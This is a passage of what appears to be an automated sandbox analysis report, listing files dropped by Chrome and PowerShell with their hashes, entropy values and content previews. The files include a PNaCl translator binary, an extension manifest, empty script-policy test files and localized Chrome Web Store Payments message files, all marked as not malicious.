                                                                                                                                                                                                                        File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9, stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1901720
                                                                                                                                                                                                                        Entropy (8bit):5.955741933854651
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:gXqUSpBjwQO2o8k+7zjidg4euCAauOILffvCpGy4Wh3BTFmHpq82K2/KsvPyla9d:gafZwcOdNe2auOepCBTFmJq3Kf8ksr
                                                                                                                                                                                                                        MD5:9DC3172630E525854B232FF71499D77C
                                                                                                                                                                                                                        SHA1:0082C58EDCE3769E90DB48E7C26090CE706AD434
                                                                                                                                                                                                                        SHA-256:6AA1DA6C264E0AF4E32A004F4076C7557C6AC6D9C38B0C5DE97302D83FA248C3
                                                                                                                                                                                                                        SHA-512:9E9584241A39EED1463D7D4C1B26AE570B839AA315778FF3400C61341EBA43B630307DE9F1532A265CA82EA69BDEA03EC9D963E59A18569C02DA8285449870FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .ELF..............>..... .......@...................@.8...@.............................................................................................0.......0................................................Y......................................................@.......@...............P.td....t^......t^......t^.......W.......W..............Q.td................................................................NaCl....x86-64..............GNU.K..J.'..b......<S...`...`... ...@...@.......@.............................................Y@......................p................@.......?..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@`...`.......@.................................................. ...`... ... .......`................... ... ...@...`.......................@... Z...[...[...e.......... ...@... ...@...`........0...0...2..`4.. 6...7...9...~...~...z...{...{..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\manifest.fingerprint
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):66
                                                                                                                                                                                                                        Entropy (8bit):3.928261499316817
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:STDLGswXEVBcVdBiTDt3zLsW:SPLGLErcVdBiDtf3
                                                                                                                                                                                                                        MD5:C00BCE97F21B1AD61EB9B8CD001795EE
                                                                                                                                                                                                                        SHA1:8E0392FF3DB267D847711C3F4E0D7468060E1535
                                                                                                                                                                                                                        SHA-256:59F06F04230E32E8BC839F45B984D31D611930427B631C963D09E7064A602363
                                                                                                                                                                                                                        SHA-512:9930E44A6ECC62505DBADCEED5E05645909FF09816FB12AAC0414E6D2830AC09758366C3B7D4EDD7839C87EB16DFA4C66D8981AE6237D408B37135C3506F4CD2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\manifest.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):573
                                                                                                                                                                                                                        Entropy (8bit):4.859567579783832
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:BLqG6yDJmL4mLDlG9hQ181G46XzrXc+EFfNqpaiOc+T5NqXIOclNqXL:BkylmL4mLDlJ18116XsRNqtZeNqXIZlE
                                                                                                                                                                                                                        MD5:1863B86D0863199AFDA179482032945F
                                                                                                                                                                                                                        SHA1:36F56692E12F2A1EFCA7736C236A8D776B627A86
                                                                                                                                                                                                                        SHA-256:F14E451CE2314D29087B8AD0309A1C8B8E81D847175EF46271E0EB49B4F84DC5
                                                                                                                                                                                                                        SHA-512:836556F3D978A89D3FC1F07FCED2732A17E314ED6A021737F087E32A69BFA46FD706EBBDFD3607FF42EDCB75DC463C29B9D9D2F122504F567BB95844F579831B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {."update_url": "https://clients2.google.com/service/update2/crx",.. "description": "Portable Native Client Translator Multi-CRX",. "name": "PNaCl Translator Multi-CRX",. "manifest_version": 2,. "minimum_chrome_version": "30.0.0.0",. "version": "0.57.44.2492",. "platforms": [. {. "nacl_arch": "x86-32",. "sub_package_path": "_platform_specific/x86_32/". },. {. "nacl_arch": "x86-64",. "sub_package_path": "_platform_specific/x86_64/". },. {. "nacl_arch": "arm",. "sub_package_path": "_platform_specific/arm/". }. ].}.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g42smy0y.3za.psm1
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mstg0eih.qml.ps1
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\390e5361-2779-4cb3-acd8-4110dc8c167d.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):248531
                                                                                                                                                                                                                        Entropy (8bit):7.963657412635355
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                                                                        MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                                                                        SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                                                                        SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                                                                        SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):796
                                                                                                                                                                                                                        Entropy (8bit):4.864931792423268
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                                                                                        MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                                                                        SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                                                                        SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                                                                        SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):675
                                                                                                                                                                                                                        Entropy (8bit):4.536753193530313
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                                                                                        MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                                                                        SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                                                                        SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                                                                        SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):641
                                                                                                                                                                                                                        Entropy (8bit):4.698608127109193
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                                                                                                                                                                                        MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                                                                                        SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                                                                                        SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                                                                                        SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):624
                                                                                                                                                                                                                        Entropy (8bit):4.5289746475384565
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                                                                                                                                                                                        MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                                                                                        SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                                                                                        SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                                                                                        SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                        Entropy (8bit):4.583694000020627
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                                                                                                                                                                                        MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                                                                                        SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                                                                                        SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                                                                                                                                                                                        SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):787
                                                                                                                                                                                                                        Entropy (8bit):4.973349962793468
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                                                                                                                                                                                        MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                                                                                        SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                                                                                        SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                                                                                        SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):593
                                                                                                                                                                                                                        Entropy (8bit):4.483686991119526
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                                                        MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                                                        SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                                                        SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                                                        SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\en_GB\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):593
                                                                                                                                                                                                                        Entropy (8bit):4.483686991119526
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                                                        MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                                                        SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                                                        SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                                                        SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):661
                                                                                                                                                                                                                        Entropy (8bit):4.450938335136508
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                                                                                                                                                                                        MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                                                                                        SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                                                                                        SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                                                                                        SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\es_419\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):637
                                                                                                                                                                                                                        Entropy (8bit):4.47253983486615
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                                                                                                                                                                                        MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                                                                                        SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                                                                                        SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                                                                                        SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):595
                                                                                                                                                                                                                        Entropy (8bit):4.467205425399467
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                                                                                                                                                                                        MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                                                                                        SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                                                                                        SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                                                                                        SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
